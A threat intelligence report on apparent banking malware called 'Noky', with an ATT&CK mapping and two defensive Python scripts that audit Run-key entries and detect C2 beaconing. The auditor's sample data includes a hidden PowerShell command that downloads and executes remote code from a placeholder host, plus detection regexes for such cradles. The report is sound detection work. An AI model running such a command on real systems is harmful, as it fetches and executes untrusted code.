Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The ‘Noky’ malware utilizes social engineering to gain initial access, typically through phishing emails leading to credential theft.
- Our analysis identified the use of T1059.001 – PowerShell for executing the malware payload, showcasing its reliance on legitimate system tools.
- Comprehensive C2 infrastructure enables the actor to maintain control over infected machines while exfiltrating data without detection.
Executive Summary
During our investigation into the ‘Noky’ malware, we observed a complete attack chain designed to infiltrate banking systems, steal credentials, and facilitate financial fraud. The malware was delivered via phishing emails that masqueraded as legitimate communications and lured victims into opening malicious links or attachments. Using a range of tactics, techniques, and procedures (TTPs), the actor maintained persistence on infected hosts and communication with a remote command and control (C2) server. Our analysis of the sample showed that the ‘Noky’ implant is particularly adept at bypassing security controls and evading detection.
Initial Access
The initial access vector of the ‘Noky’ campaign is primarily social engineering, where the actor employs phishing emails containing malicious links or attachments. During the investigation, we identified that the emails often contain familiar branding and urgent calls to action, pressuring recipients to act swiftly. Upon clicking the link, victims are directed to a spoofed website designed to harvest credentials or drop the malware. We noted that many of these phishing lures are tailored to specific geographic regions, enhancing their effectiveness, and mimicking legitimate communications from well-known banks.
Execution & Persistence
Once the victim interacts with these malicious elements, the Noky malware executes, typically leveraging T1059.001 – PowerShell as its primary means of execution. Our analysis revealed that the malware launches a PowerShell command that downloads and executes additional payloads from the C2 server. The initial payload is designed to harvest login credentials for various banking websites, using techniques consistent with T1083 – File and Directory Discovery to locate browser profiles and cached login data.
Additionally, the persistence mechanisms include modifications to registry keys, specifically HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, to ensure re-execution after a system reboot. The care the actor takes to keep a foothold in the victim’s environment shows that the campaign is built with remediation by incident responders in mind.
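The combination described above (a Run-key value that launches PowerShell with a download cradle) is something a host audit can flag directly. The following is an added example written for this report, not code from the original analysis; the Run-key entries are constructed samples with hypothetical names and an example.invalid URL, and the winreg reader is only used when the script runs on Windows.

```python
import re

# Constructed sample of HKCU\...\Run values as a registry audit might export them.
# Names and commands are hypothetical; they are not indicators from the report.
SAMPLE_RUN_ENTRIES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WinUpdateSvc": r'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/u\')"',
    "Helper": r'powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    "Teams": r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
}

# Each regex is paired with the trait it indicates; all are matched case-insensitively.
SUSPICIOUS_PATTERNS = [
    (r"\bpowershell(\.exe)?\b", "powershell launched from a Run key"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", "download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
]

def audit_run_entry(name, command):
    """Return the list of suspicious traits found in one Run-key value (empty if clean)."""
    return [label for pattern, label in SUSPICIOUS_PATTERNS
            if re.search(pattern, command, re.IGNORECASE)]

def audit_run_key(entries):
    """Return {value_name: [traits]} for every entry that shows at least one trait."""
    report = {}
    for name, command in entries.items():
        hits = audit_run_entry(name, command)
        if hits:
            report[name] = hits
    return report

def read_hkcu_run():
    """Read the live HKCU Run key on Windows; on other platforms return the sample set."""
    try:
        import winreg
    except ImportError:
        return SAMPLE_RUN_ENTRIES
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    entries = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        i = 0
        while True:
            try:
                name, data, _kind = winreg.EnumValue(key, i)
            except OSError:  # raised once all values have been enumerated
                return entries
            entries[name] = str(data)
            i += 1

if __name__ == "__main__":
    for name, hits in audit_run_key(read_hkcu_run()).items():
        print(f"{name}: {', '.join(hits)}")
```

The regexes are deliberately broad (any PowerShell launch from a Run key is reported), so expect to whitelist legitimate administrative entries before using this at scale.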
Command and Control
The C2 layer of the ‘Noky’ campaign is characterized by a distributed architecture, employing multiple domains and IP addresses to obfuscate communications. Each infected host periodically polls these domains using a randomized timing strategy to reduce the likelihood of detection. We intercepted traffic indicative of T1071.001 – Application Layer Protocol, where the implant communicates over HTTPS, camouflaging its activities as legitimate web traffic.
During our analysis, several C2 indicators were identified, including domains that have previously been associated with banking Trojans, and IPs exhibiting suspicious behavior patterns. Traffic analysis revealed a pattern in the payload structure sent to the server, indicating potential data exfiltration mechanisms, specifically targeting sensitive information such as credentials and personal identification data.
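The randomized polling over HTTPS described above still tends to be far more regular than human browsing, which is what the Detection Opportunities below rely on. The following is an added example, not code from the original analysis: it parses constructed proxy log lines (hypothetical hosts and example.invalid domains) and flags source/destination pairs whose inter-contact intervals have a low coefficient of variation. The thresholds are assumptions and need tuning per environment; heavier jitter than shown here will push the coefficient up.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines: timestamp, source host, destination host, method, status.
# Hosts and domains are hypothetical; they are not indicators from the report.
SAMPLE_PROXY_LOG = """\
2024-03-01T09:00:00 ws-17 cdn.example.invalid CONNECT 200
2024-03-01T09:00:04 ws-17 update.example.invalid CONNECT 200
2024-03-01T09:01:02 ws-17 cdn.example.invalid CONNECT 200
2024-03-01T09:02:11 ws-17 cdn.example.invalid CONNECT 200
2024-03-01T09:02:50 ws-17 cdn.example.invalid CONNECT 200
2024-03-01T09:04:08 ws-17 cdn.example.invalid CONNECT 200
2024-03-01T09:05:01 ws-17 cdn.example.invalid CONNECT 200
2024-03-01T09:00:30 ws-22 news.example.invalid CONNECT 200
2024-03-01T09:17:45 ws-22 news.example.invalid CONNECT 200
2024-03-01T09:18:02 ws-22 mail.example.invalid CONNECT 200
2024-03-01T10:40:10 ws-22 news.example.invalid CONNECT 200
"""

def parse_proxy_log(text):
    """Yield (timestamp, src, dst) from the whitespace-separated format above."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, _method, _status = line.split()
        yield datetime.fromisoformat(ts), src, dst

def find_beacons(text, min_contacts=5, max_cv=0.5):
    """Return {(src, dst): (contacts, mean_interval_s, cv)} for pairs that look like beaconing.

    cv is pstdev(interval) / mean(interval); jittered beacons keep it low, human browsing does not.
    """
    contacts = defaultdict(list)
    for ts, src, dst in parse_proxy_log(text):
        contacts[(src, dst)].append(ts)
    beacons = {}
    for pair, stamps in contacts.items():
        if len(stamps) < min_contacts:  # too few contacts to judge regularity
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            beacons[pair] = (len(stamps), round(avg, 1), round(cv, 3))
    return beacons

if __name__ == "__main__":
    for (src, dst), (n, avg, cv) in find_beacons(SAMPLE_PROXY_LOG).items():
        print(f"{src} -> {dst}: {n} contacts, mean {avg}s, cv {cv}")
```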
Lateral Movement & Discovery
The actor demonstrates an understanding of lateral movement techniques. While our sample of ‘Noky’ did not implement explicit lateral movement, it did include functions consistent with T1210 – Exploitation of Remote Services, hinting that the actor could be developing capabilities to expand their access within the network. The malware collects credentials not just for local systems but also for network resources, revealing a strategy to leverage compromised credentials for further infiltration.
Impact & Objectives
The overarching objective of the ‘Noky’ campaign is financial gain through the theft of banking credentials and illicit transactions. Our investigation indicated that the actor could execute unauthorized payments, siphoning funds from victim accounts and possibly orchestrating larger-scale financial fraud schemes. The meticulous planning behind the initial phishing email showed a clear intent to exploit human behavior, allowing the malware to circumvent many traditional security barriers.
MITRE ATT&CK Mapping
- T1071.001 – Application Layer Protocol: C2 communication through standard application layer protocols such as HTTP/HTTPS.
- T1059.001 – PowerShell: Execution of commands through PowerShell scripts to execute secondary payloads.
- T1083 – File and Directory Discovery: Discovery of browser profiles for credential harvesting.
Detection Opportunities
- Implementing threat intelligence feeds to track known malicious domains and IPs associated with ‘Noky’.
- Monitoring for unusual PowerShell activities, especially those involving outbound HTTPS connections.
- Analyzing email traffic for signs of phishing attempts, particularly messages with urgency or requests for account verification.
Analyst Notes
The rising sophistication of threats like ‘Noky’ underscores the need for comprehensive security awareness training for employees. Additionally, organizations must consider leveraging advanced behavioral detection mechanisms alongside traditional signature-based defenses to effectively mitigate such threats. Continuous monitoring for outbound data transfers and anomalous user behaviors can serve as critical deterrents against these evolving threats.